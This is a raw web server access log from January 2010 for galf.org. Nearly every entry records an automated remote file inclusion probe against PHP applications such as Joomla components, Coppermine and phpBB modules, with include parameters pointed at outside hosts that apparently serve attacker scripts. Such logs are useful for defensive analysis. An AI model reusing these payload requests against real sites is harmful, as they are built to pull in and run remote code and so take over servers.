78.110.50.121 - - [11/Jan/2010:04:39:24 -0800] "GET /logs/access_091207.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:39:24 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:39:25 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:39:25 -0800] "GET /logs/access_091207.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:39:25 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:39:51 -0800] "GET /logs/access_090727.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:39:51 -0800] "GET /logs/access_090629.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:40:09 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:40:09 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:40:09 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:40:16 -0800] "GET /logs/access_091123.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:40:18 -0800] "GET /logs/access_091123.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:40:23 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:40:45 -0800] "GET /logs/access_091207.log/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:40:45 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:40:45 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:41:00 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:41:00 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:41:00 -0800] "GET /logs/access_090810.log//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:41:01 -0800] "GET /logs/access_091207.log/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:41:01 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:41:01 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:41:17 -0800] "GET /appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:41:17 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:41:32 -0800] "GET /logs/access_091123.log/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:41:42 -0800] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:41:48 -0800] "GET /logs/access_091123.log/e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:42:20 -0800] "GET /logs/access_090629.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:42:20 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:42:20 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:42:50 -0800] "GET /logs/access_090706.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:04:42:52 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:04:42:57 -0800] "GET /logs/access_090525.log//?_SERVER[DOCUMENT_ROOT]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:44:37 -0800] "GET /logs/access_091019.log%20%20//skin/zero_vote/error.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:46:20 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:46:54 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:47:14 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:47:14 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.48.154 - - [11/Jan/2010:04:48:54 -0800] "GET /logs/access_091207.log/rgboard/include/mail.inc.php?skin_board_path=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.192.48.154 - - [11/Jan/2010:04:48:54 -0800] "GET /rgboard/include/mail.inc.php?skin_board_path=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.192.48.154 - - [11/Jan/2010:04:48:54 -0800] "GET /logs/rgboard/include/mail.inc.php?skin_board_path=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:50:04 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:50:04 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:50:04 -0800] "GET /logs/access_090629.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [11/Jan/2010:04:52:53 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [11/Jan/2010:04:52:54 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [11/Jan/2010:04:52:54 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:04:53:38 -0800] "GET /logs/access_091207.log/e404.php?DOCUMENT_ROOT=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:04:53:38 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:04:53:38 -0800] "GET /e404.php?DOCUMENT_ROOT=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:04:53:42 -0800] "GET /logs/access_091123.log/e404.php?DOCUMENT_ROOT=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:54:18 -0800] "GET /logs/access_100104.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:54:18 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:54:18 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
117.74.98.18 - - [11/Jan/2010:04:55:46 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://dickysingh.com/wp-content/uploads/.thumbs/languages/x1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [11/Jan/2010:04:55:46 -0800] "GET /logs///geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://dickysingh.com/wp-content/uploads/.thumbs/languages/x1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [11/Jan/2010:04:55:46 -0800] "GET /logs/access_091123.log%20%20///geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://dickysingh.com/wp-content/uploads/.thumbs/languages/x1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:55:55 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.222.82 - - [11/Jan/2010:04:55:55 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.222.82 - - [11/Jan/2010:04:55:55 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.222.82 - - [11/Jan/2010:04:56:07 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:56:07 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:56:07 -0800] "GET /logs/access_100104.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.126 - - [11/Jan/2010:04:56:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:57:32 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:57:32 -0800] "GET /logs/access_090817.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:57:32 -0800] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.48.154 - - [11/Jan/2010:04:57:42 -0800] "GET /logs/access_090824.log/rgboard/include/mail.inc.php?skin_board_path=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:57:45 -0800] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:57:45 -0800] "GET /logs/access_090817.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:57:45 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:57:56 -0800] "GET /appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [11/Jan/2010:04:58:04 -0800] "GET /logs/access_090525.log///?g4_path=http://indo.home.ro/idscan.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.galf.org"
123.143.98.5 - - [11/Jan/2010:04:58:05 -0800] "GET //?g4_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
123.143.98.5 - - [11/Jan/2010:04:58:06 -0800] "GET /logs///?g4_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 200 4805 "-" "libwww-perl/5.805" "www.galf.org"
123.143.98.5 - - [11/Jan/2010:04:58:09 -0800] "GET /logs/access_090629.log///?g4_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:58:12 -0800] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:58:12 -0800] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:58:39 -0800] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:58:39 -0800] "GET /logs/access_090921.log%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:58:39 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:59:09 -0800] "GET /logs/access_090629.log%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:04:59:14 -0800] "GET /logs/access_090629.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [11/Jan/2010:05:01:18 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [11/Jan/2010:05:01:18 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [11/Jan/2010:05:01:18 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:01:40 -0800] "GET /logs/access_090629.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:02:05 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:02:05 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:02:05 -0800] "GET /logs/access_091221.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.126 - - [11/Jan/2010:05:02:40 -0800] "GET /labia/?S=D HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:03:51 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:03:51 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:03:51 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:03:55 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:03:55 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:03:55 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:04:04 -0800] "GET /logs/access_100104.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:05:04:15 -0800] "GET /logs/access_100104.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:05:05:56 -0800] "GET /include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:05:05:56 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:05:05:56 -0800] "GET /logs/access_100104.log%20%20//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:05:06:05 -0800] "GET /include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.23.156.168 - - [11/Jan/2010:05:06:05 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.23.156.168 - - [11/Jan/2010:05:06:05 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.131.106.16 - - [11/Jan/2010:05:07:20 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [11/Jan/2010:05:07:20 -0800] "GET / HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:08:00 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:08:00 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:08:00 -0800] "GET /logs/access_091221.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:08:38 -0800] "GET /logs/access_090921.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:09:41 -0800] "GET /logs/access_091214.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:09:41 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:09:41 -0800] "GET /logs/access_091228.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:05:09:41 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:05:15:46 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:05:15:46 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:05:18:14 -0800] "GET /includes/db_adodb.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:05:18:14 -0800] "GET /logs/access_090720.log%20%20//includes/db_adodb.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
